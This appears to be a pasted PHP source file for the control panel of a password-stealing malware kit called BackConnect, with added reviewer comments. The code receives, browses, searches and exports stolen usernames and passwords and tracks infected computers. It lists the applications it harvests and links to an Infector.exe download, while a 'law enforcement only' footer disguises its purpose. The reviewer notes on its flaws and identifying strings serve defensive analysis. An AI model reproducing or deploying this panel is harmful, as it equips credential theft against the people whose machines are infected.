
Untitled

a guest
Jul 27th, 2017
  1. <?php
  2.  
  3. include 'config.php';
  4.  
  5. // ********************************************************************************************
  6.  
// Page skeleton shared by the authenticated views: each view emits
// $html . <title text> . $header . <body> . $footer.
// NOTE(review): the fixed strings below (title prefix "BC Log Manager - ", the footer line,
// the ?action=... navigation set) appear unchanged in those views, so they are usable as
// content signatures when identifying a deployed copy of this panel.
$html = "<html><head><title>BC Log Manager - ";
// $username is not defined in this file; presumably it comes from config.php. It is written
// into the header without HTML escaping. The greeting text is Czech ("How are you").
$header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
<div id='web'><div id='header'><b>Jak se máš ".$username."?</b></div><div id='navigation'><ul>
<li><a href='?action=logs'>All Logs</a></li><li><a href='?action=search'>Search</a></li>
<li><a href='?action=suspects'>Suspects</a></li>
<li><a href='?action=export'>Export</a></li>
<li><a href='?action=info'>Information</a></li>
<li><a href='?action=logout'>Logout</a></li>
</ul></div><br>";
$footer = "<div id='footer'>(C) 2010 - FOR LAW ENFORCEMENTS ONLY. United States law applies.</div></div></body></html>";
// Search form. $_POST["q"] is read on every request, whether or not it is set, and echoed back
// into a single-quoted attribute.
// NOTE(review): htmlspecialchars() is called with default flags; where the default is ENT_COMPAT
// single quotes are left unencoded, which does not match the single-quoted attribute used here.
$searchform = "<form name='search' method='POST' action='?action=search'>
Search for: <input type='text' name='q' size='20' value='".htmlspecialchars($_POST["q"])."'> In: <select name='in'>
<option value='1' selected='selected'>Url</option><option value='2'>Username</option>
<option value='3'>Password</option><option value='4'>Computer ID</option>
<option value='5'>Date</option><option value='6'>IP</option></select>
<input type='submit' value='Search' name='search'></form>";
// Export form is split in two so the export branch can insert one <option> per application.
$exportform1 = "<form name='search' method='POST' action='?action=export'><select name='in'>";
$exportform2 = "</select> <input type='submit' value='Export' name='Export'></form>";
// Login form posts username/password to ?action=login. No anti-CSRF token field is present
// in this or any other form in the file.
$loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
<table id='logintable' cellpadding='2' cellspacing='0' border='0'>
<tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
<tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
<tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
// Client-side helpers: "select all" toggles for the sel1[] / sel2[] checkbox groups and
// confirm() prompts before a delete. These run in the browser only; the server-side
// "selected" branch does not depend on them.
$javascript = "<script language='javascript' type='text/javascript'>
function CheckElements1() { chk = document.getElementsByName('sel1[]');
for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel1'].checked) chk[i].checked = true; else chk[i].checked = false;}}
function CheckElements2() { chk = document.getElementsByName('sel2[]');
for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel2'].checked) chk[i].checked = true; else chk[i].checked = false;}}
function ConfirmElements1() { chk = document.getElementsByName('sel1[]');
for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
alert('At least one option must be select.'); return false;}
function ConfirmElements2() { chk = document.getElementsByName('sel2[]');
for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
alert('At least one option must be select.'); return false;}
function ConfirmElements12() {
chk1 = document.getElementsByName('sel1[]');
chk2 = document.getElementsByName('sel2[]');
for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
alert('At least one option must be select.'); return false;
}
function ConfirmElements12Evidence() {
chk1 = document.getElementsByName('sel1[]');
chk2 = document.getElementsByName('sel2[]');
for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return true; }}
for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return true; }}
alert('At least one option must be select.'); return false;
}
</script>";
// Column-name lookup tables. Request-supplied indexes (sort, search "in") are mapped through
// these arrays before being placed in SQL, so only these names reach ORDER BY / WHERE.
// $cols is indexed for the `logs` table, $cols2 for the `suspects` table.
$cols = array("program", "url", "login", "pass", "compid", "date", "ip");
$cols2 = array("compid", "os", "computer", "user", "install", "date", "ip", "country");
  58.  
  59. // FUNCTIONS ******************************************************************************
/**
 * Open a connection with the legacy mysql_* API and select the configured database.
 *
 * Reads $dbHost, $dbUser, $dbPass and $dbDatabase as globals; they are not defined in this
 * file and presumably come from config.php. On either failure the function appends an error
 * page to the global $html and ends the request with die().
 *
 * NOTE(review): the mysql_* extension used throughout this file was removed in PHP 7.0, which
 * bounds the PHP versions this panel can run on.
 *
 * @return resource link returned by mysql_connect()
 */
function connect_database() {
global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
$mysql = mysql_connect($dbHost, $dbUser, $dbPass);
if (!$mysql) {
// Connection failed: render the generic error page and stop.
$html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
die($html);
}
if (!mysql_select_db($dbDatabase, $mysql)) {
// Connected but the schema is missing: close the link before reporting.
// The configured database name is included in the error page.
mysql_close($mysql);
$html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
die($html);
}
return $mysql;
}
  74. function pages_number($logstotal, $logspage, $page, $site) {
  75. $pagesnumber = ceil($logstotal/$logspage);
  76. $temp = "Pages: ";
  77. for ($i=0; $i<$pagesnumber; $i++) {
  78. if ($_SESSION[$page] == $i)
  79. $temp .= " <span class='page1'>".$i."</span>";
  80. else
  81. $temp .= " <span class='page0'><a href='?action=".$site."&".$page."=".$i."'>".$i."</a></span>";
  82. }
  83. $temp .= " Results ".($_SESSION[$page]*$logspage)." - ".(($_SESSION[$page]*$logspage)+$logspage)." of about ".$logstotal;
  84. return $temp;
  85. }
  86. function sort_order() {
  87. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  88. return $tmp;
  89. }
  90.  
  91. // LOGIN **************************************************************************************
// Access gate. Every request passes through here before the action router below.
// A session counts as authenticated when it holds the configured user name and was created
// from the same REMOTE_ADDR as the current request.
session_start();
if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
if ($_GET["action"] == "login") {
// NOTE(review): a single account; $username / $password are not defined in this file
// (presumably config.php) and are compared as plaintext with loose `==`. No password hashing,
// no constant-time comparison, no attempt limiting and no session id regeneration are visible.
if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
// Second session_start() in the same request; the session was already started above.
session_start();
$_SESSION["user"] = $username;
$_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
// Default view state: sort index 5 is "date" in both $cols and $cols2; order 1 maps to DESC.
$_SESSION["sort"] = 5;
$_SESSION["sort2"] = 5;
$_SESSION["order"] = 1;
$_SESSION["page"] = 0;
$_SESSION["page2"] = 0;

// Post-login sanity check: both tables the panel reads (`logs`, `suspects`) must exist.
$mysql = connect_database();
$result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
if (!$result) {
$html .= "Database Error".$header."Table 'logs' not present, please run the installation script first.".$footer;
die($html);
}
$result = mysql_query("SELECT COUNT(*) FROM `suspects`;", $mysql);
if (!$result) {
$html .= "Database Error".$header."Table 'suspects' not present, please run the installation script first.".$footer;
die($html);
}
mysql_close($mysql);
// No exit after the redirect header: execution continues into the action router with
// action=login, which matches none of its branches and ends in the final "unknown" branch.
header("Location: ?action=logs");
} else {
// Wrong or missing credentials: show the login form again under a "Login Error" title.
$html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
echo $html;
exit;
}
} else {
// Unauthenticated request for any other action: show the login form and stop.
$html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
echo $html;
exit;
}
}
  129.  
  130. // LOGOUT ************************************************************************************
// Action router: one if/elseif chain on $_GET["action"], reached only after the access gate
// earlier in the file let the request through. $logspage, $aplications, $installation,
// $ApplicationCount and $InstallCodeRestart are not defined in this file (presumably config.php).
// NOTE(review): values read from the `logs` and `suspects` tables originate from reporting
// hosts and are written into HTML and text output without escaping in every view below.
// Anyone examining a seized or sinkholed instance should treat rendered rows as untrusted content.
if ($_GET["action"] == "logout") {
// Clears the panel's session keys, then everything else in the session; the session
// itself is not destroyed.
unset($_SESSION["user"]);
unset($_SESSION["ip"]);
unset($_SESSION["sort"]);
unset($_SESSION["sort2"]);
unset($_SESSION["order"]);
unset($_SESSION["page"]);
unset($_SESSION["page2"]);
session_unset();
header("Location: index.php");

// LOGS **************************************************************************************
} elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {

// Clicking the current sort column flips ASC/DESC; clicking another column selects it.
// NOTE(review): `sort` is only range-compared; unlike `page` below it has no is_numeric() test
// before it is stored and later used as an index into $cols.
if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
if ($_SESSION["sort"] == $_GET["sort"])
if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
}

$mysql = connect_database();
// Program id 14 is excluded from this view (the author's comment further down calls it "key info").
$result = mysql_query("SELECT COUNT(*) FROM `logs` WHERE `program` != 14 ;", $mysql);
$logstotal = mysql_result($result, 0);
if ($logstotal > 0) {
if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
$_SESSION["page"] = $_GET["page"];

// ORDER BY column comes from the $cols lookup, direction from sort_order(); LIMIT offset and
// size are computed from the session page and $logspage.
$result = mysql_query("SELECT * FROM `logs` WHERE `program` != 14 ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
// NOTE(review): raw database error text is sent to the client here and at every other
// die(mysql_error()) in this chain.
if (!$result) die(mysql_error());

$html .= "Logs".$header.$javascript."
<form name='frm' method='POST' action='?action=selected'>
<table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url</a></td>
<td><a href='?action=logs&sort=2'>Username</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
<td><a href='?action=logs&sort=4'>Computer ID</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
<td><a href='?action=logs&sort=6'>IP</a></td>
<td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'></td></tr>";
$i = 0;
while ($row = mysql_fetch_array($result)) {
if ($row["program"] != 14) { // dont display key info here
$html .= "<tr class='";
if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
// Program id is mapped to a display name via $aplications; url, login, pass, compid, date
// and ip are concatenated as stored, and url is also used as a link target.
$html .= "'><td>".$aplications[$row["program"]]."</td>";
$html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
$html .= "<td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
$html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
$i++;
}
}
$html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page", "logs").
"</div><input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements1()) return false;'></div></form>".$footer;
} else {
$html .= "Logs".$header."No logs found!".$footer;
}
mysql_close($mysql);
echo $html;

// SEARCH ************************************************************************************
} elseif ($_GET["action"] == "search") {
// Label targeted by the `goto Search` in the "selected" branch, which re-runs the search
// after a delete using the q / in values carried in the form's hidden fields.
Search:
if (isset($_GET["q"])) { $_POST["q"] = $_GET["q"]; $_POST["in"] = 4; /* for suspect-search link */ }
// `in` selects the column through $cols (1..6); it is validated as numeric and range-checked.
if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
$mysql = connect_database();

// list detailed info of suspect (if comp-id is given)
if ($_POST["in"] == 4)
{
// Exact match on compid in both tables; the search value is passed through
// mysql_real_escape_string() before being quoted into the statement.
$result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` = '".mysql_real_escape_string($_POST["q"], $mysql)."';", $mysql);
$result2 = mysql_query("SELECT * FROM `suspects` WHERE ".mysql_real_escape_string($cols[$_POST["in"]], $mysql)." = '".mysql_real_escape_string($_POST["q"], $mysql)."' ORDER BY date ASC;", $mysql);
if (!$result1 || !$result2) die(mysql_error());
if (mysql_num_rows($result1) == 0 && mysql_num_rows($result2) == 0)
{
// Early exit: the page is emitted without $footer and the connection is not closed explicitly.
$html .= "Search".$header.$searchform."<br>No results found!";
die($html);
}
}

// otherwise normal search in logs table
else
{
// Substring match; LIKE wildcards inside the search value are not escaped.
$result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` LIKE '%".mysql_real_escape_string($_POST["q"], $mysql)."%';", $mysql);
if (!$result1) die(mysql_error());
if (mysql_num_rows($result1) == 0)
{
$html .= "Search".$header.$searchform."<br>No results found!";
die($html);
}
}

$html .= "Search".$header.$javascript.$searchform."<form name='frm' method='POST' action='?action=selected'>";

// display the suspects table
if ($_POST["in"] == 4 && mysql_num_rows($result2) > 0) {
$html .= "
<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td>Computer ID</td><td>OS</td>
<td>Computer</td><td>User</td>
<td>Installation</td><td>Date</td>
<td>IP</td><td>Country</td>
<td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'>".
"<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
"<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
"</td></tr>";
$i = 0;
while ($row = mysql_fetch_array($result2)) {
$html .= "<tr class='";
if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
$html .= "'><td>".$row["compid"]."</td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
$html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
$html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
$i++;
}
$html .= "</table><br>";
}

// display the log table
if (mysql_num_rows($result1) > 0) {
$html .= "
<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td>Program</td><td>Url</td>
<td>Username</td><td>Password</td>
<td>Computer ID</td><td>Date</td>
<td>IP</td>
<td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'>".
"<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
"<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
"</td></tr>";
$i = 0;
while ($row = mysql_fetch_array($result1)) {
$html .= "<tr class='";
if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
$html .= "'><td>".$aplications[$row["program"]]."</td>";
$html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
$html .= "<td>".$row["compid"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
$html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
$i++;
}
$html .= "</table>";
}

// page numbers and delete button
// NOTE(review): the search term is escaped in the form fields above but is echoed here as received.
$html .= "<div id='pages'><div id='numbers'>".mysql_num_rows($result1)." results for '".$_POST["q"]."'</div><div id='delete'>".
"<input name='buttonact' type='submit' value='Export Evidence' onclick='if (!ConfirmElements12Evidence()) return false;'>&nbsp;".
"<input name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements12()) return false;'>".
"</div></div></form>";

$html .= $footer;
mysql_close($mysql);
} else {
// No (valid) query yet: show the bare search form. The title text used here is "Logs".
$html .= "Logs".$header.$searchform.$footer;
}
echo $html;

// SELECTED **************************************************************************************
} elseif ($_GET["action"] == "selected") {
// Target of the result-table forms. The submit button's value (buttonact) picks the operation.
// NOTE(review): these state-changing POSTs carry no anti-CSRF token; only the session gate
// earlier in the file protects them.
if (isset($_POST["buttonact"])) {

// DELETE SELECTED ***********************************************************************
if ($_POST["buttonact"] == "Delete Selected") {

// delete entries from logs table (selection 1)
if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
$mysql = connect_database();
// Builds "... WHERE `id` = a OR `id` = b;" from the ids that pass is_numeric(); the
// str_replace() strips the trailing " OR". If no id passes, the statement is left as
// "DELETE FROM `logs` WHERE;" and the resulting mysql_error() text is printed.
$query = "DELETE FROM `logs` WHERE";
for ($i=0; $i<count($_POST["sel1"]); $i++) {
if (is_numeric($_POST["sel1"][$i]))
$query .= " `id` = ".mysql_real_escape_string($_POST["sel1"][$i], $mysql)." OR";
}
$query .= ';';
$query = str_replace(' OR;', ';', $query);
$result = mysql_query($query, $mysql);
if (!$result) die(mysql_error());
mysql_close($mysql);
}

// delete entries from suspects table (selection 2)
if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
$mysql = connect_database();
// Same query construction as for `logs` above, against `suspects`.
$query = "DELETE FROM `suspects` WHERE";
for ($i=0; $i<count($_POST["sel2"]); $i++) {
if (is_numeric($_POST["sel2"][$i]))
$query .= " `id` = ".mysql_real_escape_string($_POST["sel2"][$i], $mysql)." OR";
}
$query .= ';';
$query = str_replace(' OR;', ';', $query);
$result = mysql_query($query, $mysql);
if (!$result) die(mysql_error());
mysql_close($mysql);
}

// After deleting: jump back into the search branch when the form carried q/in, otherwise
// redirect to the suspects or logs list depending on which selection was posted.
if (isset($_POST["q"]) && isset($_POST["in"])) // return to search, suspects or logs
// header("Location: ?action=search");
goto Search; // fix me
elseif (isset($_POST["sel2"]) && count($_POST["sel2"])!=0)
header("Location: ?action=suspects");
else
header("Location: ?action=logs");

// EXPORT SELECTED ***********************************************************************
} elseif ($_POST["buttonact"] == "Export Evidence" && isset($_POST["q"])) {
// Plain-text download of the selected rows.
// NOTE(review): the posted search term is placed in the Content-Disposition filename without
// validation or quoting.
header("Content-Type: text/plain");
header("Content-Disposition: Attachment; filename=evidence ".$_POST["q"].".txt");
header("Pragma: no-cache");

// Fixed report banner; exported files from this panel start with this text.
echo "\r\n BackConnect Password and Information Stealer\r\n Evidence Report\r\n ================================================\r\n";

// logs table
if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
$mysql = connect_database();
// Ids are gated by is_numeric() only; unlike the delete path they are not passed through
// mysql_real_escape_string().
$query = "SELECT * FROM `logs` WHERE";
for ($i=0; $i<count($_POST["sel1"]); $i++) {
if (is_numeric($_POST["sel1"][$i]))
$query .= " `id` = ".$_POST["sel1"][$i]." OR";
}
$query .= ';';
$query = str_replace(' OR;', ';', $query);
$result = mysql_query($query, $mysql);
if (!$result) die(mysql_error());
echo "\r\n\r\n";
// One record per captured credential, fields labelled and separated by a dashed line.
while ($row = mysql_fetch_array($result)) {
echo "Program: ".$aplications[$row['program']]."\r\n";
echo "Url/Host: ".$row['url']."\r\n";
echo "Login: ".$row['login']."\r\n";
echo "Password: ".$row['pass']."\r\n";
echo "Computer ID: ".$row['compid']."\r\n";
echo "Date: ".$row['date']."\r\n";
echo "IP: ".$row['ip']."\r\n";
echo "----------------------------------------------------------\r\n";
}
mysql_close($mysql);
}

// suspects table
if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
$mysql = connect_database();
$query = "SELECT * FROM `suspects` WHERE";
for ($i=0; $i<count($_POST["sel2"]); $i++) {
if (is_numeric($_POST["sel2"][$i]))
$query .= " `id` = ".$_POST["sel2"][$i]." OR";
}
$query .= ';';
$query = str_replace(' OR;', ';', $query);
$result = mysql_query($query, $mysql);
if (!$result) die(mysql_error());
echo "\r\n\r\n";
// One record per reporting host; `host` is exported here but is not shown in the HTML tables.
while ($row = mysql_fetch_array($result)) {
echo "Computer ID: ".$row['compid']."\r\n";
echo "OS: ".$row['os']."\r\n";
echo "Computer: ".$row['computer']."\r\n";
echo "User: ".$row['user']."\r\n";
echo "Installation: ".$installation[$row["install"]]."\r\n";
echo "Date: ".$row['date']."\r\n";
echo "IP: ".$row['ip']."\r\n";
echo "Country: ".$row['country']."\r\n";
echo "Host: ".$row['host']."\r\n";
echo "----------------------------------------------------------\r\n";
}
mysql_close($mysql);
}

}

}

// SUSPECTS **********************************************************************************
} elseif ($_GET["action"] == "suspects") {

// Same sort toggle as the logs view, over the eight $cols2 columns. It shares
// $_SESSION["order"] with the logs view, and `sort` again has no is_numeric() test.
if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=7) {
if ($_SESSION["sort2"] == $_GET["sort"])
if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort2"] = $_GET["sort"];
}

$mysql = connect_database();
// Rows whose install code equals $InstallCodeRestart are left out of this list.
$result = mysql_query("SELECT COUNT(*) FROM suspects WHERE install <> ".$InstallCodeRestart.";", $mysql);
$logstotal = mysql_result($result, 0);
if ($logstotal > 0) {
if (isset($_GET["page2"]) && is_numeric($_GET["page2"]) && $_GET["page2"]>=0 && $_GET["page2"]<=ceil($logstotal/$logspage))
$_SESSION["page2"] = $_GET["page2"];

$result = mysql_query("SELECT * FROM suspects WHERE install <> ".$InstallCodeRestart." ORDER BY ".$cols2[$_SESSION["sort2"]]." ".sort_order()." LIMIT ".($logspage*$_SESSION["page2"])." , ".$logspage.";", $mysql);
if (!$result) die(mysql_error());

$html .= "Suspects".$header.$javascript."
<form name='frm' method='POST' action='?action=selected'>
<table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
<td><a href='?action=suspects&sort=0'>Computer ID</a></td><td><a href='?action=suspects&sort=1'>OS</a></td>
<td><a href='?action=suspects&sort=2'>Computer</a></td><td><a href='?action=suspects&sort=3'>User</a></td>
<td><a href='?action=suspects&sort=4'>Installation</a></td><td><a href='?action=suspects&sort=5'>Date</a></td>
<td><a href='?action=suspects&sort=6'>IP</a></td><td><a href='?action=suspects&sort=7'>Country</a></td>
<td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'></td></tr>";
$i = 0;
while ($row = mysql_fetch_array($result)) {
$html .= "<tr class='";
if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
// Host-reported fields (compid, os, computer, user, date, ip, country) are concatenated as stored.
$html .= "'><td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
$html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
$html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
$i++;
}
$html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page2", "suspects")."</div>".
"<input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements2()) return false;'></div></form>".$footer;
} else {
$html .= "Suspects".$header."No suspects found!".$footer;
}
mysql_close($mysql);
echo $html;

// EXPORT ************************************************************************************
} elseif ($_GET["action"] == "export") {

// Bulk export of every `logs` row for one program id.
// NOTE(review): `in` is checked as numeric and below $ApplicationCount, with no lower bound.
if (isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"] < $ApplicationCount) {
$mysql = connect_database();
$query = "SELECT * FROM `logs` WHERE `program` =".mysql_real_escape_string($_POST["in"], $mysql).";";
$result = mysql_query($query, $mysql);
if (!$result) die(mysql_error());
header("Content-Type: text/plain");
header("Content-Disposition: Attachment; filename=log ".$aplications[$_POST["in"]].".txt");
header("Pragma: no-cache");
// Same record layout as the "Export Evidence" path, without the report banner.
while ($row = mysql_fetch_array($result)) {
echo "Program: ".$aplications[$row['program']]."\r\n";
echo "Url/Host: ".$row['url']."\r\n";
echo "Login: ".$row['login']."\r\n";
echo "Password: ".$row['pass']."\r\n";
echo "Computer ID: ".$row['compid']."\r\n";
echo "Date: ".$row['date']."\r\n";
echo "IP: ".$row['ip']."\r\n";
echo "----------------------------------------------------------\r\n";
}
mysql_close($mysql);
// The connection is reopened and closed again with nothing in between; no effect on the output.
$mysql = connect_database();

mysql_close($mysql);
} else {
// No selection posted: render the program picker, one option per index below $ApplicationCount.
for ($i = 0; $i < $ApplicationCount; $i++)
$exportform1 .= "<option value='".$i."'>".$aplications[$i]."</option>";
$html .= "Logs".$header.$exportform1.$exportform2.$footer;
echo $html;
}

// INFORMATION **********************************************************************************
} elseif ($_GET["action"] == "info") {

// Static "about" page with the version string, the author's list of applications whose stored
// credentials are collected, and two download links.
// NOTE(review): for incident response, this list is the author's own statement of which
// credential stores to treat as exposed on a host that reported to the panel; the version
// text and the /downloads/ paths are further fixed strings for identifying a deployment.
$html .= "Information".$header;
$html .= "Version: 1.3<br>Date: -<br><br>This is BackConnect. ".
"For any questions and upgrades, please contact -. This copy is registered to: - Click on a computer id to show the complete collected evidence.<br><br>".
"It steals following information:<br>* MSN<br>* Google Talk<br>* Trillian<br>* Pidgin<br>".
"* Paltalk<br>* Steam<br>* No-IP<br>* DynDNS<br>* Firefox (all versions)<br>* Internet Explorer (unreliable)<br>".
"* FileZilla<br>* FlashFXP<br>* Keys from various games and software<br>* Outlook (old versions)<br>* IMVU<br>* Internet Download Manager<br>* Chrome (< 2010)".
"<br>* RapidShare Downloader<br>* SmartFTP<br>* CoreFTP<br>* FTP Commander<br>* Total Commander<br>* Protected Storage<br><br>".
"For further information and legal information please read the readme.<br><br>".
"<a href='/downloads/Infector.exe'>Link to your Infector.exe</a><br><a href='/downloads/Disinfector.exe'>Link to your Disinfector.exe</a><br><br>";
$html .= $footer;
echo $html;

// Unknown ***********************************************************************************
} else {
// Any other action value: an empty page with header and footer only.
$html .= $header.$footer;
echo $html;
}
  490. ?>